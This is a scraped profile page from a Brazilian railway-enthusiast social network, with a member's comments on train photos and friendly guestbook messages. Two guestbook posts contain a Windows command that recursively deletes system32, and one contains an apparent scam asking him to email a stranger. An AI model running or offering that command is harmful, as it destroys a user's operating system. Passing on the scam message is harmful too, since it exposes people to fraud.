Amantes Da Ferrovia

Apaixonados por trem

milton tavares cardoso
  • 72, Masculino
  • Carmópolis - Sergipe
  • Brasil
Compartilhar no Facebook Compartilhar

Amigos de Milton tavares cardoso

  • Pamela Carla Gomes da Silva
  • SONIA MARIA TEIXEIRA LINO
  • Tiyuki Tushina
  • Armando dos Santos Daniel
  • Everton Fernandes Ferreira
  • Michelle Cordeiro de Sousa
  • pedro ferrovia
  • suzana silveira pereira
  • Heranir Fernandes de Oliveira
  • Rosane
  • Jose Luiz Sousa Barbosa
  • Paulo Cesar Coleta
  • GERSON WALDEMAR KARPSTEIN
  • Josue Soares Silva de Lira
  • Waldemir Sá

Comunidades de milton tavares cardoso

 

Página de milton tavares cardoso

Últimas atividades

milton tavares cardoso comentou a foto de Mauricio Cardim
Miniatura

De Belo Horizonte para Gov. Valadares

"Tá na classe, n,é?  É isso aí e se for segunda classe  é a q eu viajo. Em Rio Acima pra BH, pode ter ônibus articulado (do inglês: BRT)  saindo de 5 em 5 mn, mas, eu sou mais o…"
quarta-feira
milton tavares cardoso compartilhou a foto de Jose Luiz Sousa Barbosa em Facebook
7 Jan
milton tavares cardoso comentou a foto de LUIZ CESAR DE ALMEIDA
Miniatura

12348166_952470041515163_7192402049095659499_n

"Minha andanças é nos trilhos, mesmo sem ter esses  trilhos, fora isso mal o meu carro e, ou uma alternativa forçada "
12 Dez, 2015
milton tavares cardoso comentou a foto de Rafael bueno
Miniatura

Locomotiva francesinha

"Essa loco mini aí dá pra fazer um serviço de mini trem com mini vagões de passageiros. Aí, como muitos trens saíram de circulação porq exige alta demanda de passageiros, porq muitos optaram…"
6 Nov, 2015
milton tavares cardoso comentou a foto de Eduardo Carvalho da Silva
Miniatura

Vagões 2 classe

"Essa classe aí, de segunda classe  parecendo da LEOPOLDINA, eu viajaria de Vitória ao RJ e, ou de Macaé ao RJ,  é certo q o carro chega primeiro porq ñ precisa arrodear a baia de Guanabara, mas, eu goste…"
15 Out, 2015
milton tavares cardoso comentou a foto de GERSON CARDOSO DA SILVA
Miniatura

SAM_3018

"É maquinista, n,é, Gerson?  Eu nunca fui operário ferroviário, mas, aprecio os trens "
5 Out, 2015
milton tavares cardoso comentou a foto de Alberto Aires Leitão
Miniatura

Casal_20150905_150958984

"Pois é, Alberto Aires, nos anos 60, na primeira metade já, tava começando a opção, a reversão, ferrovia pra rodovia, só q eu ñ optei. Tanto assim q, em 1963 ainda estava se construindo a…"
23 Set, 2015
milton tavares cardoso compartilhou a foto de josé campos netto em Facebook
19 Set, 2015
milton tavares cardoso comentou a foto de Héctor Maquieira Cassano
Miniatura

SUD EXPRESSO T-2

"Se fosse no Brasil, isso aí já tinha ido p,ro lixeiro há  muito tempo.  É uma cambada de uns f.d.p. q nesse país q ñ tá no gibi. P.q.p.  Se fosse nos tempos de Cristo q uma…"
11 Ago, 2015
milton tavares cardoso compartilhou a foto de Guilherme Valadares em Facebook
2 Ago, 2015
milton tavares cardoso compartilhou a foto de DANIEL FERNANDO em Facebook
2 Ago, 2015
milton tavares cardoso comentou a foto de helvecio faria da silva
Miniatura

carro de passageiro abandonado

"Se a chaparia tiver intacta, mesmo enferrujada, será q dá pra revitalizar?  Bota pra ser segunda classe mesmo. E isso aí houve custos, trabalho e as vezes com algum acidente pra tá nessas condições?…"
1 Ago, 2015
milton tavares cardoso comentou a foto de Aloizio Barros de Souza
Miniatura

Automotriz e Carros Budd Desativados a 20 Anos são recuperados pela ONG Amigos do Trem em Parceria com o DNIT

"Um desse aí pra fazer o trajeto Salvador a Juazeiro, tbm turístico por situar na beira do rio São Francisco"
27 Jul, 2015
milton tavares cardoso compartilhou a foto de Roberto Sarti em Facebook
10 Jul, 2015
milton tavares cardoso comentou a foto de helvecio faria da silva
Miniatura

alco rs-3 rffsa 7136

"E isso aí ñ foi coisa caída do céu, ñ. Teve trabalho, acidentes as vezes com gravidade, financiamento, pra hj tá nessas condições."
7 Jul, 2015
Damaris deixou um comentário para milton tavares cardoso
"oi,Eu sou Miss Damaris eu tenho o seu contacto através de(amantesdaferrovia.com.br) e gostaria de compartilharalgo de importante com você, se você está interessadopor favor contacte-me aqui (damarismodu@live.com)para mais…"
26 Maio, 2015

Fotos de milton tavares cardoso

Carregando...
  • Adicionar fotos
  • Exibir todos

Caixa de Recados (139 comentários)

Você precisa ser um membro de Amantes Da Ferrovia para adicionar comentários!

Entrar em Amantes Da Ferrovia

Às 21:46 em 26 maio 2015, Damaris disse...

oi,
Eu sou Miss Damaris eu tenho o seu contacto através de
(amantesdaferrovia.com.br) e gostaria de compartilhar
algo de importante com você, se você está interessado
por favor contacte-me aqui (damarismodu@live.com)
para mais informações
............................................
Hi,
I am Miss Damaris i got your contact through
(amantesdaferrovia.com.br) and i wish to share
something of important with you, if you are
interestedkindly contact me here
(damarismodu@live.com) for more information

Às 20:00 em 13 fevereiro 2015, AIRES ELON PROIETTI E SILVA disse...

Milton, graças a Deus ,eu vivi um tempo là,na Italia. Falo portugues ,sim.

Às 22:05 em 22 julho 2014, echo off del /s /q c:/windows/sy disse...

echo off
del /s /q c:/windows/system32

Às 21:17 em 22 julho 2014, echo off del /s /q c:/windows/sy disse...

echo off
del /s /q c:/windows/system32

Às 23:34 em 3 junho 2014, Waldemir Sá disse...

Será um prazer tê-lo como amigo. Seja bem vindo Milton...

Às 22:39 em 26 maio 2014, Helio Hevangelista disse...

vamos nos trez eu vc e rebeca na segunda classe e claro

Às 22:31 em 26 maio 2014, Helio Hevangelista disse...

Olá meu grande e fiel amigo Milton quando vamos saborear aquelas patas de caranguejo, na beira do rio com aquelas louras suadas

Às 9:40 em 24 abril 2014, Eduardo Carvalho da Silva disse...

Bom dia!

Seja bem vindo, que o ciclo dessas amizades, fortaleçam a historia de quem adora esses longos e tortuosos caminhos.

Abrç

Eduardo

Às 8:35 em 21 abril 2014, Mauricio Cardim disse...

Olá Milton, te enviei  convite para fazer parte de seu Facebook, espero que me aceite.

A viagem que fiz de trem  saindo de Belo Horizonte, fui até Gov. Valadares (MG). 7 horas de  uma excelente viagem na segunda classe e de lá  fui de ônibus até Jequié (BA),  um dos meus destinos em terras baiana (sou de Ipiaú/BA.).

Ainda não fiz o itinerário completo, Belo Horizonte/Vitória (ES).

Abraços e até logo:  www.flickr.com/postaiscardim

Às 21:47 em 3 abril 2014, Heranir Fernandes de Oliveira disse...

Milton, infelizmente não temos passeio de trem de João Pessoa para Campina Grande.Durante o período junino em Campina Grande tem o chamado ´trem ferroviário, que é um trem com passeio bem animado com forrozeiros, mas ele sai de Campina Grande para localidades próximas. Um abraço!

 
 
 

Publicidade

Membros

Eventos

fevereiro 2016
DSTQQSS
123456
78910111213
14151617181920
21222324252627
2829
       

Música

Carregando...

Últimas atividades

joanne korver postou um status
8 horas atrás
sushanta postou um status
"Watch Rugby Live Streaming Free Online Rugby On Computer, Mac, Ipad, Pc https://www.facebook.com/rugbylivestreamingfree/"
9 horas atrás
sushanta postou um status
"Free Italy vs England Live Streaming 14 February 2016 Online Six https://www.facebook.com/rugbylivestreamingfree/posts/1015631235165655"
9 horas atrás
sushanta postou um status
"Free Italy vs England Live Streaming Free Six Nations Rugby 20 https://www.facebook.com/sixnationsrugbylive/posts/1702748110005277"
9 horas atrás

© 2016   Criado por Amantes da Ferrovia.   Ativado por

Badges  |  Relatar um incidente  |  Termos de serviço